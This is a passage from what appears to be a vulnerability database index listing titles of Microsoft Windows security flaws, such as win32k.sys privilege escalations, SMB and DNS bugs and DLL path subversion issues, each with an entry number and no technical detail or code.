Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft 